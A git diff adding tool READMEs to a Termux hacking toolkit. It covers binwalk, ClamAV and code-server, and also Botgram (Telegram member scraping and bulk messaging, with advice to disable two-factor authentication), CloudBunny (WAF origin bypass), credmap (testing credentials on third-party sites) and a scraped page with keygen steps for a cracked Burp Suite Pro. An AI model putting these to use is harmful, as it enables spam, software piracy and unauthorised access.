+[![Maintenance](https://img.shields.io/badge/Maintained%3F-yes-green.svg)](https://GitHub.com/ReFirmLabs/binwalk/graphs/commit-activity) +[![GitHub license](https://img.shields.io/github/license/ReFirmLabs/binwalk.svg)](https://github.com/ReFirmLabs/binwalk/blob/master/LICENSE) +[![GitHub stars](https://img.shields.io/github/stars/badges/shields.svg?style=social&label=Stars)](https://github.com/ReFirmLabs/binwalk/stargazers) + +Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images. + + +### Installation and Usage + +* [Installation](./INSTALL.md) +* [API](./API.md) +* [Supported Platforms](https://github.com/ReFirmLabs/binwalk/wiki/Supported-Platforms) +* [Getting Started](https://github.com/ReFirmLabs/binwalk/wiki/Quick-Start-Guide) +* [Binwalk Command Line Usage](https://github.com/ReFirmLabs/binwalk/wiki/Usage) +* [Binwalk IDA Plugin Usage](https://github.com/ReFirmLabs/binwalk/wiki/Creating-Custom-Plugins) + +More information on [Wiki](https://github.com/ReFirmLabs/binwalk/wiki) + +## Quick start + +### Installation +Binwalk follows the standard Python installation procedure: + +```bash +$ sudo python setup.py install +``` + +If you're running Python 2.x, installing the optional Python lzma module is strongly recommended (but not required): + +```bash +$ sudo apt-get install python-lzma +``` + +For instructions on installing other optional dependencies, see [installation guide](https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md). + + +### Usage + +Basic usage is simple: + +```bash +$ binwalk firmware.bin + +DECIMAL HEXADECIMAL DESCRIPTION +-------------------------------------------------------------------------------- +0 0x0 TRX firmware header, little endian, header size: 28 bytes, image size: 14766080 bytes, CRC32: 0x6980E553 flags: 0x0, version: 1 +28 0x1C LZMA compressed data, properties: 0x5D, dictionary size: 65536 bytes, uncompressed size: 5494368 bytes +2319004 0x23629C Squashfs filesystem, little endian, version 4.0, compression: xz, size: 12442471 bytes, 3158 inodes, blocksize: 131072 bytes, blocksize: 131072 bytes, created: 2014-05-21 22:38:47 +``` + +For additional examples and descriptions of advanced options, see the [wiki](https://github.com/ReFirmLabs/binwalk/wiki). diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/blackbox.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/blackbox.md new file mode 100755 index 00000000..267d982a --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/blackbox.md @@ -0,0 +1,3 @@ +#It need modules requests pexpect passlib +# +#You can add those execute pip2 install diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/botgram.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/botgram.md new file mode 100755 index 00000000..c000d7e4 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/botgram.md @@ -0,0 +1,51 @@ +# BOTGRAM v.1 2021 by @Ivam3 + +- Botgram help you to fetch all information about Telegram group members that you manage. It automates the mass sending of messages and the addition of members to other groups from the command line (CLI). + +# Setting + +- In order for botgram manage your account, it needs the identifier number (ID) and the hash of the Telegram API to be able to connect remotely to your account. In turn, the second authentication factor must be deactivated from Telegram settings. And for this you must go to the section "API development tools" of the official Telegram site at : + +• https://my.telegram.org/ + +## • How To Install and Use + +`$ pkg install -y git python` + +`$ git clone https://github.com/ivam3/botgram.git` + +`$ cd botgram` + +* Install requierments + +`$ python setup.py --install` + +* setup configration file ( apiID, apiHASH ) + +`$ python setup.py --config` + +* To merge 2 .csv files in one + +`$ python setup.py --merge file1.csv file2.csv` + +* To Genrate User Data + +`$ python getdata.py` + +* ( members.csv is default if you changed name use it ) +* Send bulk message to collected data + +`$ python sendmsg.py members.csv` + +* Add members to your group + +`$ python add2group.py members.csv` + +# DISCLAIMER +If the law is violated with it's use, this would be the responsibility of the user who handled it.. Ivam3 is not responsible for the misuse that can be given to everything that this tool entails + +To get help about how to use it and/or to report some issues join to : + + • https://t.me/Ivam3_Bot + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/burpsuite.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/burpsuite.md new file mode 100755 index 00000000..7a6b9f3c --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/burpsuite.md @@ -0,0 +1,1505 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + burpsuite/README.md at master · thehackingsage/burpsuite · GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ Skip to content + + + + + + + + + + +
+ +
+ + + + + + + +
+ + + +
+ + + + + + + + + + +
+
+
+ + + + + + + + + + + + + + +
+
+ + + + + + + + +
+ + + + + Permalink + + +
+ +
+
+ + + master + + + + +
+
+
+ Switch branches/tags + +
+ + + +
+ +
+ +
+ + +
+ +
+ + + + + + + + + + + + + + + + +
+ + +
+
+
+
+ +
+ +
+ + + + Go to file + + +
+ + + + +
+
+
+ + + + +
+ +
+
+
 
+
+ +
+
 
+ Cannot retrieve contributors at this time +
+
+ + + + + + + + +
+ +
+ + + + +
+ + 72 lines (38 sloc) + + 2.74 KB +
+ + + +
+ +
+
+ + +
+

+

BurpSuite Pro, Plugins and Payloads

+

Article : https://thehacktronian.blogspot.com/2018/09/burpsuitepro.html

+

Download BurpSuite Pro, Plugins and Payloads : http://bit.ly/burpsuitepro

+

Payloads : https://github.com/1N3/IntruderPayloads

+

More Payloads : https://github.com/swisskyrepo/PayloadsAllTheThings

+

Requirements :

+

Burp requires a computer with the official Java Runtime Environment (64-bit edition, version 1.6 or later) installed.

+

Download the latest Java Runtime Environment (JRE) : Click Here

+

How To Use Burp Suite Pro ? :

+
    +
  • +

    Download BurpSuitePro as ZIP : http://bit.ly/burpsuitepro

    +
  • +
  • +

    extract > BurpSuite Folder > core Folder

    +
  • +
  • +

    open BurpSuite-Keygen.jar with java

    +
  • +
  • +

    open BurpSuite-Pro-v1.7.37.jar with java

    +
  • +
  • +

    copy-paste Licence from Keygen to BurpSuite and Click on Next

    +
  • +
  • +

    choose Manual Installation and copy-paste Activation Request from BurpSuite to Keygen

    +
  • +
  • +

    now copy-paste Activation Response from Keygen to BurpSuite

    +
  • +
  • +

    click next and your pro version will activate

    +
  • +
+

that's it !!! start using BurpSuite Pro v1.7.37.exe

+

you don't have to repeat this process again and again. after doing it once Windows User run .exe file & Linux User run .sh file to use the BurpSuitePro.

+

if you face any problem feel free to ask..

+

How To Use Burp Suite Plugins ? :

+
    +
  • +

    open BurpSuite

    +
  • +
  • +

    go to Extender > Extensions

    +
  • +
  • +

    click on Add and Select .jar file & then click on Next

    +
  • +
+

+

That's It !!!

+

One More Thing You Need To Know That Now You Are Using BurpSuite Pro So Now You Can Also Use All Pro Extensions From BApp Store.

+

Some Useful Extensions in BApp Store :

+

Backslash Powered Scanner, Reflected Parameters, SAML Encoder/Decoder, Bypass WAF, CVSS Calculator, Java deserialization Scanner, Autorize, BurpSmartBuster, Content Type Converter, JSON Beautifier, PsychoPATH, Retire-js, J2EEScan, SAML Raider, Active Scan ++, UUID Detector, Wsdler, Additional Scanner Checks, CO2 Flow, Hackvertor, Meth0dMan & Paramalyzer.

+

+

Video Tutorial :

+

YouTube : Soon

+

That's It !!!

+

& Don't Forget To Follow Me At Twitter, Instagram, Github & SUBSCRIBE My YouTube Channel..!!!

+

Thankyou. +Keep Visiting.. +Enjoy.!!! :)

+
+
+ +
+ +
+ + + +
+ + +
+ + +
+
+ + +
+ + + +
+
+ +
+
+ +
+ + + + + + + + + + + + + + + + + + + + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/chatgpt.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/chatgpt.md new file mode 100755 index 00000000..a857c5b5 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/chatgpt.md @@ -0,0 +1,49 @@ +# Quick guide for option chatGPT from command i-Haklab. + +A simple, lightweight shell script to use OpenAI's chatGPT and DALL-E from the terminal. +The script uses the `completions` endpoint and the `text-davinci-003` model for chatGPT and the `images/generations` endpoint for generating images. +/ +## Features + +- Chat with GPT from the terminal +- Generate images from a text prompt +- View your chat history +- Chat context, GPT remembers previous chat questions and answers +- List all available OpenAI models +- Set OpenAI request parameters + +## Getting Started + +## Usage + +### Start + + - Run the script by using the `chatGPT` option from the command i-Haklab anywhere + ```bash + i-Haklab chatGPT + ``` + +### Commands + + - `image:` To generate images, start a prompt with `image:` + If you are using iTerm, you can view the image directly in the terminal. Otherwise the script will ask to open the image in your browser. + - `history` To view your chat history, type `history` + - `models` To get a list of the models available at OpenAI API, type `models` + - `model:` To view all the information on a specific model, start a prompt with `model:` and the model `id` as it appears in the list of models. For example: `model:text-babbage:001` will get you all the fields for `text-babbage:001` model + +### Chat context + + - You can enable chat context mode for the model to remember your previous chat questions and answers. This way you can ask follow-up questions. To enable this mode start the script with `-c` or `--chat-context`. i.e. `i-Haklab chatGPT --chat-context` and start to chat normally. + +### Set request parameters + + - To set request parameters you can start the script like this: `i-Haklab chatGPT --temperature 0.9 --model text-babbage:001 --max-tokens 100 --size 1024x1024` + + The available parameters are: + - temperature, `-t` or `--temperature` + - model, `-m` or `--model` + - max number of tokens, `--max-tokens` + - image size, `-s` or `--size` (The sizes that are accepted by the OpenAI API are 256x256, 512x512, 1024x1024) + + To learn more about these parameters you can view the [API documentation](https://platform.openai.com/docs/api-reference/completions/create) + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/clamav.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/clamav.md new file mode 100755 index 00000000..eb308e83 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/clamav.md @@ -0,0 +1,354 @@ +ClamAV +Maeve, the ClamAV mascot + +ClamAV is an open source (GPLv2) anti-virus toolkit, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates. The core of the package is an anti-virus engine available in a form of shared library. + +Tip: ClamAV is not a traditional anti-virus or endpoint security suite. For a fully featured modern endpoint security suite, check out Cisco Secure Endpoint. See "related products", below, for more details. + +ClamAV is brought to you by Cisco Systems, Inc. + +Community Projects +ClamAV has a diverse ecosystem of community projects, products, and other tools that either depend on ClamAV to provide malware detection capabilities or supplement ClamAV with new features such as improved support for 3rd party signature databases, graphical user interfaces (GUI), and more. + +Features: + +ClamAV is designed to scan files quickly. + +Real time protection (Linux only). The ClamOnAcc client for the ClamD scanning daemon provides on-access scanning on modern versions of Linux. This includes an optional capability to block file access until a file has been scanned (on-access prevention). + +ClamAV detects millions of viruses, worms, trojans, and other malware, including Microsoft Office macro viruses, mobile malware, and other threats. + +ClamAV's bytecode signature runtime, powered by either LLVM or our custom bytecode interpreter, allows the ClamAV signature writers to create and distribute very complex detection routines and remotely enhance the scanner’s functionality. + +Signed signature databases ensure that ClamAV will only execute trusted signature definitions. + +ClamAV scans within archives and compressed files but also protects against archive bombs. Built-in archive extraction capabilities include: + +Zip (including SFX, excluding some newer or more complex extensions) +RAR (including SFX, most versions) +7Zip +ARJ (including SFX) +Tar +CPIO +Gzip +Bzip2 +DMG +IMG +ISO 9660 +PKG +HFS+ partition +HFSX partition +APM disk image +GPT disk image +MBR disk image +XAR +XZ +Microsoft OLE2 (Office documments) +Microsoft OOXML (Office documments) +Microsoft Cabinet Files (including SFX) +Microsoft CHM (Compiled HTML) +Microsoft SZDD compression format +HWP (Hangul Word Processor documents) +BinHex +SIS (SymbianOS packages) +AutoIt +InstallShield +ESTsoft EGG +Supports Windows executable file parsing, also known as Portable Executables (PE) both 32/64-bit, including PE files that are compressed or obfuscated with: +AsPack +UPX +FSG +Petite +PeSpin +NsPack +wwpack32 +MEW +Upack +Y0da Cryptor +Supports ELF and Mach-O files (both 32 and 64-bit) +Supports almost all mail file formats +Support for other special files/formats includes: +HTML +RTF +PDF +Files encrypted with CryptFF and ScrEnc +uuencode +TNEF (winmail.dat) +Advanced database updater with support for scripted updates, digital signatures and DNS based database version queries + +Disclaimer: Many of the above file formats continue to evolve. Executable packing and obfuscation tools in particular are constantly changing. We cannot guarantee that we can unpack or extract every version or variant of the listed formats. + +License +ClamAV is licensed under the GNU General Public License, Version 2. + +Supported platforms +Clam AntiVirus is highly cross-platform. The development team cannot test every OS, so we have chosen to test ClamAV using the two most recent Long Term Support (LTS) versions of each of the most popular desktop operating systems. Our regularly tested operating systems include: + +GNU/Linux +Alpine +3.11 (64bit) +Ubuntu +18.04 (64bit, 32bit) +20.04 (64bit) +Debian +9 (64bit, 32bit) +10 (64bit, 32bit) +CentOS +7 (64bit, 32bit) +8 (64bit) +Fedora +30 (64bit) +31 (64bit) +openSUSE +Leap (64bit) +UNIX +FreeBSD +11 (64bit) +12 (64bit) +macOS +10.13 High Sierra (x86_64) +10.15 Catalina (x86_64) +11.5 Big Sur (x86_64, arm64) +Windows +7 (64bit, 32bit) +10 (64bit, 32bit) +Recommended System Requirements +The following minimum recommended system requirements are for using ClamScan or ClamD applications with the standard ClamAV signature database provided by Cisco. + +Minimum recommended RAM for ClamAV: + +FreeBSD and Linux server edition: 2 GiB+ +Linux non-server edition: 2 GiB+ +Windows 7 & 10 32-bit: 2 GiB+ +Windows 7 & 10 64-bit: 3 GiB+ +macOS: 3 GiB+ +Minimum recommended CPU for ClamAV: + +1 CPU at 2.0 Ghz+ +Minimum available hard disk space required: + +For the ClamAV application we recommend having 5 GB of free space available. This recommendation is in addition to the recommended disk space for each OS. + +Note: The tests to determine these minimum requirements were performed on systems that were not running other applications. If other applications are being run on the system, additional resources will be required in addition to our recommended minimums. + +Mailing Lists and Chat +If you have a trouble installing or using ClamAV try asking on our mailing lists. There are four lists available: + +clamav-announce (at) lists.clamav.net +info about new versions, moderated. +Subscribers are not allowed to post to this mailing list. +clamav-users (at) lists.clamav.net +user questions +clamav-devel (at) lists.clamav.net +technical discussions +clamav-virusdb (at) lists.clamav.net +database update announcements, moderated +clamav-binary (at) lists.clamav.net +discussion and announcements for package maintainers +You can subscribe and search the mailing list archives here. + +You can also join the community on our ClamAV Discord chat server. + +Submitting New or Otherwise Undetected Malware +If you've got a virus which is not detected by the current version of ClamAV using the latest signature databases, please submit the sample for review at our website: + +https://www.clamav.net/reports/malware + +Likewise, if you have a benign file that is flagging as a virus and you wish to report a False Positive, please submit the sample for review at our website: + +https://www.clamav.net/reports/fp + +## DAEMON + +ClamD +clamd is a multi-threaded daemon that uses libclamav to scan files for viruses. Scanning behavior can be fully configured to fit most needs by modifying clamd.conf. + +As clamd requires a virus signature database to run, we recommend setting up ClamAV's official signatures before running clamd using freshclam. + +The daemon works by listening for commands on the sockets specified in clamd.conf. Listening is supported over both unix local sockets and TCP sockets. + +IMPORTANT: clamd does not currently protect or authenticate traffic coming over the TCP socket, meaning it will accept any and all of the following commands listed from any source. Thus, we strongly recommend following best networking practices when setting up your clamd instance. I.e. don't expose your TCP socket to the Internet. + +Here is a quick list of the commands accepted by clamd over the socket. + +PING +VERSION +RELOAD +SHUTDOWN +SCAN file/directory +RAWSCAN file/directory +CONTSCAN file/directory +MULTISCAN file/directory +ALLMATCHSCAN file/directory +INSTREAM +FILDES +STATS +IDSESSION, END +As with most ClamAV tools, you can find out more about these by invoking the command: + + +man clamd +The daemon also handles the following signals as so: + +SIGTERM - perform a clean exit +SIGHUP - reopen the log file +SIGUSR2 - reload the database +It should be noted that clamd should not be started using the shell operator & or other external tools which would start it as a background process. Instead, you should run clamd which will load the database and then daemonize itself (unless you have specified otherwise in clamd.conf). After that, clamd is ready to accept connections and perform file scanning. + +Once you have set up your configuration to your liking, and understand how you will be sending commands to the daemon, running clamd itself is simple. Simply execute the command: + + +clamd +ClamDScan +clamdscan is a clamd client, which greatly simplifies the task of scanning files with clamd. It sends commands to the clamd daemon across the socket specified in clamd.conf and generates a scan report after all requested scanning has been completed by the daemon. + +Thus, to run clamdscan, you must have an instance of clamd already running as well. + +Please keep in mind, that as a simple scanning client, clamdscan cannot change scanning and engine configurations. These are tied to the clamd instance and the configuration you set up in clamd.conf. Therefore, while clamdscan will accept many of the same commands as its sister tool clamscan, it will simply ignore most of them as (by design) no mechanism exists to make ClamAV engine configuration changes over the clamd socket. + +Again, running clamdscan, once you have a working clamd instance, is simple: + + +clamdscan [*options*] [*file/directory/-*] +ClamDTop +clamdtop is a tool to monitor one or multiple instances of clamd. It has a colorized ncurses interface, which shows each job queued, memory usage, and information about the loaded signature database for the connected clamd instance(s). By default it will attempt to connect to the local clamd as defined in clamd.conf. However, you can specify other clamd instances at the command line. + +To learn more, use the commands + + +man clamdtop +or + + +clamdtop --help +On-Access Scanning +The ClamOnAcc application provides On-Access Scanning for Linux systems. On-Access Scanning is a form of real-time protection that uses ClamD to scan files when they're accessed. + +ClamOnAcc (v0.102+) +ClamAV's On-Access Scanning (clamonacc) is a client that runs in its own application alongside, but separately from the clamd instance. The On-Access Scanner is capable of preventing access to/from any malicious files it discovers--based on the verdict it receives from clamd--but by default it is configured to run in notify-only mode, which means it will simply alert the user if a malicious file is detected, then take any additional actions that the user may have specified at the command line, but it will not actively prevent processes from reading or writing to that file. + +Disclaimer: Enabling Prevention mode will seriously impact performance if used on commonly accessed directories. + +Tip: You can run ClamOnAcc multiple times simultaneously, each with a different config. If you want to enable Prevention-mode for one directory, while sticking to notify-only mode for any other monitored directories, that's an option! + +On-Access Scanning is primarily set up through clamd.conf. However, you can learn more about all the configuration and command line options available to you by reading the On-Access Scanning User Guide. + +Once you have set up the On-Access Scanner (and clamd) to your liking, you will first need to run clamd before you can start it. If your clamd instance is local, it is required you run clamd as a user that is excluded (via OnAccessExcludeUname or OnAccessExcludeUID) from On-Access scanning events (e.g.) to prevent clamonacc from triggering events endlessly as it sends scan requests to clamd: + + +su - clamav -c "/usr/local/bin/clamd +After the daemon is running, you can start the On-Access Scanner. clamonacc must be run as root in order to utilize its kernel event detection and intervention features: + + +sudo clamonacc +It will run a number of startup checks to test for a sane configuration, and ensure it can connect to clamd, and if everything checks out clamonacc will automatically fork to the background and begin monitoring your system for events. + +ClamD (v0.101) +In older versions, ClamAV's On-Access Scanner is a thread that runs within a clamd instance. The On-Access Scanner is capable of blocking access to/from any malicious files it discovers--based on the verdict it finds using the engine it shares with clamd--but by default it is configured to run in notify-only mode, which means it will simply alert the user if a malicious file is detected, but it will not actively prevent processes from reading or writing to that file. + +On-Access Scanning is primarily set up through clamd.conf. However, you can learn more about all the configuration and command line options available to you by reading the On-Access Scanning User Guide. + +Once you have set up the On-Access Scanner to your liking, you will need to run clamd with elevated permissions to start it. + + +sudo clamd +One-Time Scanning +ClamScan +clamscan is a command line tool which uses libclamav to scan files and/or directories for viruses. Unlike clamdscan, clamscan does not require a running clamd instance to function. Instead, clamscan will create a new engine and load in the virus database each time it is run. It will then scan the files and/or directories specified at the command line, create a scan report, and exit. + +By default, when loading databases, clamscan will check the location to which freshclam installed the virus database signatures. This behavior, along with a myriad of other scanning and engine controls, can be modified by providing flags and other options at the command line. + +There are too many options to list all of them here. So we'll only cover a few common and more interesting ones: + +--log=FILE - save scan report to FILE +--database=FILE/DIR - load virus database from FILE or load all supported db files from DIR +--official-db-only[=yes/no(*)] - only load official signatures +--max-filesize=#n - files larger than this will be skipped and assumed clean +--max-scansize=#n - the maximum amount of data to scan for each container file +--leave-temps[=yes/no(*)]- do not remove temporary files +--file-list=FILE - scan files from FILE +--quiet - only output error messages +--bell - sound bell on virus detection +--cross-fs[=yes(*)/no] - scan files and directories on other filesystems +--move=DIRECTORY - move infected files into DIRECTORY +--copy=DIRECTORY - copy infected files into DIRECTORY +--bytecode-timeout=N - set bytecode timeout (in milliseconds) +--heuristic-alerts[=yes(*)/no] - toggles heuristic alerts +--alert-encrypted[=yes/no(*)] - alert on encrypted archives and documents +--nocerts - disable authenticode certificate chain verification in PE files +--disable-cache - disable caching and cache checks for hash sums of scanned files +To learn more about the options available when using clamscan please reference: + + +man clamscan +and + + +clamscan --help +Otherwise, the general usage of clamscan is: + + +clamscan [options] [file/directory/-] +Some basic scans +Run this to scan the files in the current directory: + + +clamscan . +This will scan the current directory. At the end of the scan, it will display a summary. If you notice in the clamscan output, it only scanned something like 60 files, even though there are more files in subdirectories. By default, clamscan will only scan files in the current directory. + +Run this to scan all the files in the current directory: + + +clamscan --recursive . +Run this to scan ALL the files on your system, it will take quite a while. Keep in mind that you can cancel it at any time by pressing Ctrl-C: + +Linux/Unix: + + +clamscan --recursive / +Windows: + + +clamscan.exe --recursive C:\ +Process Memory Scanning +Note: This feature requires Windows and ClamAV version 0.105 or newer. You must also be running ClamAV as Administrator. + +clamscan and clamdscan are able to scan the virtual memory of currently executing processes. To do so, use the --memory option: + + +clamscan --memory +The --kill and --unload options allow for killing/unloading infected loaded modules. + +Disclaimers +Disclaimer: ClamAV doesn't have a "quick scan" mode. ClamAV is malware detection toolkit, not an endpoint security suite. It's up to you to decide what to scan. A full system scan is going to take a long time with ClamAV or with any anti-virus software. + +Disclaimer 2: ClamScan, ClamOnAcc, and ClamDScan each include --remove options for deleting any file which alerts during a scan. This is generally a terrible idea, unless you're monitoring an upload/downloads directory. False positives happen! You do not want to have the wrong file accidentally deleted. Instead, consider using --move or perhaps just --copy and set up script with the ClamD VirusEvent feature to notify you when something has been detected. + +Windows-specific Issues +Globbing +Since the Windows command prompt doesn't take care of wildcard expansion, minimal emulation of unix glob() is performed internally. It supports * and ? only. + +File paths +Please always use the backslash as the path separator. SMB Network shares and UNC paths are supported. + +Socket and libclamav API Input +The Windows version of ClamAV requires all the input to be UTF-8 encoded. + +This affects: + +The API, notably the cl_scanfile() function +ClamD socket input, e.g. the commands SCAN, CONTSCAN, MUTLISCAN, etc. +ClamD socket output, i.e replies to the above queries +For legacy reasons ANSI (i.e. CP_ACP) input will still be accepted and processed as before, but with two important remarks: + +Socket replies to ANSI queries will still be UTF-8 encoded. +ANSI sequences which are also valid UTF-8 sequences will be handled as UTF-8. +As a side note, console output (stdin and stderr) will always be OEM encoded, even when redirected to a file. + + +Related Products +Cisco Secure Endpoint (formerly AMP for Endpoints) is Cisco's cloud-based security suite for commercial and enterprise customers. Secure Endpoint is available for Windows, Linux, and macOS and provides superior malware detection capabilities, behavioral monitoring, dynamic file analysis, endpoint isolation, analytics, and threat hunting. Secure Endpoint sports a modern administrative web interface (dashboard). + +Immunet is a cloud-based antivirus application for Windows that is free for non-commercial use. Immunet offers great malware detection efficacy but, as a completely free product, Immunet's does not have same features or the quality user experience that Secure Endpoint offers. There is an Immunet user forum but Cisco offers no official user support. + +Cisco Systems, Inc diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cloudbunny.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cloudbunny.md new file mode 100755 index 00000000..4677627f --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cloudbunny.md @@ -0,0 +1,93 @@ +# CloudBunny + +CloudBunny is a tool to capture the origin server that uses a WAF as a proxy or protection. + +You can read more about the tool here: https://tinyurl.com/y8p48wb3 + +

+ +

+ +# How works + +In this tool we used three search engines to search domain information: Shodan, Censys and Zoomeye. To use the tools you need the API Keys, you can pick up the following links: + +
+Shodan - https://account.shodan.io/
+Censys - https://censys.io/account/api
+ZoomEye - https://www.zoomeye.org/profile
+
+ +NOTE: In Zoomeye you need to enter the login and password, it generates a dynamic api key and I already do this work for you. Just enter your login and password. + +After that you need to put the credentials in the api.conf file. + +Install the requirements: + +
+$ sudo pip install -r requirements.txt
+
+ +# Usage + +By default the tool searches on all search engines (you can set this up by arguments), but you need to put the credentials as stated above. After you have loaded the credentials and installed the requirements, execute: + +
+$ python cloudbunny.py -u securityattack.com.br
+
+ +Check our help area: + +
+$ python cloudbunny.py -h
+
+ +Change securityattack.com.br for the domain of your choice. + +# Example + +
+
+$ python cloudbunny.py -u site_example.com.br
+
+	            /|      __  
+	           / |   ,-~ /  
+	          Y :|  //  /    
+	          | jj /( .^  
+	          >-"~"-v"  
+	         /       Y    
+	        jo  o    |  
+	       ( ~T~     j   
+	        >._-' _./   
+	       /   "~"  |    
+	      Y     _,  |      
+	     /| ;-"~ _  l    
+	    / l/ ,-"~    \  
+	    \//\/      .- \  
+	     Y        /    Y*  
+	     l       I     ! 
+	     ]\      _\    /"\ 
+	    (" ~----( ~   Y.  )   
+	~~~~~~~~~~~~~~~~~~~~~~~~~~    
+CloudBunny - Bypass WAF with Search Engines 
+Author: Eddy Oliveira (@Warflop)
+https://github.com/Warflop 
+    
+[+] Looking for target on Shodan...
+[+] Looking for target on Censys...
+[+] Looking for certificates on Censys...
+[+] Looking for target on ZoomEye...
+[-] Just more some seconds...
+
+
++---------------+------------+-----------+----------------------------+
+|   IP Address  |    ISP     |   Ports   |        Last Update         |
++---------------+------------+-----------+----------------------------+
+|  55.14.232.4  | Amazon.com | [80, 443] | 2018-11-02T16:02:51.074543 |
+| 54.222.146.40 | Amazon.com |    [80]   | 2018-11-02T10:16:38.166829 |
+| 18.235.52.237 | Amazon.com | [443, 80] | 2018-11-08T01:22:11.323980 |
+| 54.237.93.127 | Amazon.com | [443, 80] | 2018-11-05T15:54:40.248599 |
+| 53.222.94.157 | Amazon.com | [443, 80] | 2018-11-06T08:46:03.377082 |
++---------------+------------+-----------+----------------------------+
+    We may have some false positives :)
+
diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/code-server.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/code-server.md new file mode 100755 index 00000000..db350cd9 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/code-server.md @@ -0,0 +1,71 @@ + + +# Termux + +- [Install](#install) +- [Upgrade](#upgrade) +- [Known Issues](#known-issues) + - [Search doesn't work](#search-doesnt-work) + - [Backspace doesn't work](#backspace-doesnt-work) + + + +Termux is a terminal application and Linux environment that you can also use to +run code-server from your Android phone. + +## Install + +1. Install Termux from [F-Droid](https://f-droid.org/en/packages/com.termux/). +1. Make sure it's up-to-date: `apt update && apt upgrade` +1. Install required packages: `apt install build-essential python git nodejs yarn` +1. Install code-server: `yarn global add code-server` +1. Run code-server: `code-server` and navigate to localhost:8080 in your browser + +## Upgrade + +To upgrade run: `yarn global upgrade code-server --latest` + +## Known Issues + +The following details known issues and suggested workarounds for using +code-server with Termux. + +### Search doesn't work + +There is a known issue with search not working on Android because it's missing +`bin/rg` ([context](https://github.com/cdr/code-server/issues/1730#issuecomment-721515979)). To fix this: + +1. Install `ripgrep` with `pkg` + + ```sh + pkg install ripgrep + ``` + +1. Make a soft link using `ln -s` + + ```sh + # run this command inside the code-server directory + ln -s $PREFIX/bin/rg ./lib/vscode/node_modules/vscode-ripgrep/bin/rg + ``` + +### Backspace doesn't work + +When using Android's on-screen keyboard, the backspace key doesn't work +properly. This is a known upstream issue: + +- [Issues with backspace in Codespaces on Android (Surface Duo)](https://github.com/microsoft/vscode/issues/107602) +- [Support mobile platforms](https://github.com/xtermjs/xterm.js/issues/1101) + +There are two workarounds. + +**Option 1:** Modify keyboard dispatch settings + +1. Open the Command Palette +2. Search for **Preferences: Open Settings (JSON)** +3. Add `"keyboard.dispatch": "keyCode"` + +The backspace button should work at this point. + +_Thanks to @Nefomemes for the [suggestion](https://github.com/cdr/code-server/issues/1141#issuecomment-789463707)!_ + +**Option 2:** Use a Bluetooth keyboard. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/credmap.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/credmap.md new file mode 100755 index 00000000..da9827ad --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/credmap.md @@ -0,0 +1,45 @@ +credmap: The Credential Mapper +=== + +Credmap is an open source tool that was created to bring awareness to the dangers of credential reuse. It is capable of testing supplied user credentials on several known websites to test if the password has been reused on any of these. An official introductionary post can be found [here](http://websec.ca/blog/view/credmap). + +### Help Menu + Usage: credmap.py --email EMAIL | --user USER | --load LIST [options] + + Options: + -h/--help show this help message and exit + -v/--verbose display extra output information + -u/--username=USER.. set the username to test with + -p/--password=PASS.. set the password to test with + -e/--email=EMAIL set an email to test with + -l/--load=LOAD_FILE load list of credentials in format USER:PASSWORD + -f/--format=CRED_F.. format to use when reading from file (e.g. u|e:p) + -x/--exclude=EXCLUDE exclude sites from testing + -o/--only=ONLY test only listed sites + -s/--safe-urls only test sites that use HTTPS. + -i/--ignore-proxy ignore system default HTTP proxy + --proxy=PROXY set proxy (e.g. "socks5://192.168.1.2:9050") + --list list available sites to test with + +### Examples + ./credmap.py --username janedoe --email janedoe@email.com + ./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com" + ./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com" + ./credmap.py -e janedoe@example.com --verbose --proxy "https://127.0.0.1:8080" + ./credmap.py --load creds.txt --format "e.u.p" + ./credmap.py -l creds.txt -f "u|e:p" + ./credmap.py -l creds.txt + ./credmap.py --list + + +### Add new websites +Adding new websites to be tested using credmap can be done by creating a new XML file in the websites/ folder. To view a list of all possible tags that can be used in the XML file, please refer to the [Wiki](https://github.com/lightos/credmap/wiki). + +### Docker +Build and deploy with the following: +```bash +git clone https://github.com/lightos/credmap.git +cd credmap +docker build -t credmap . +docker run -it credmap +``` \ No newline at end of file diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/crunch.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/crunch.md new file mode 100755 index 00000000..398cfc5c --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/crunch.md @@ -0,0 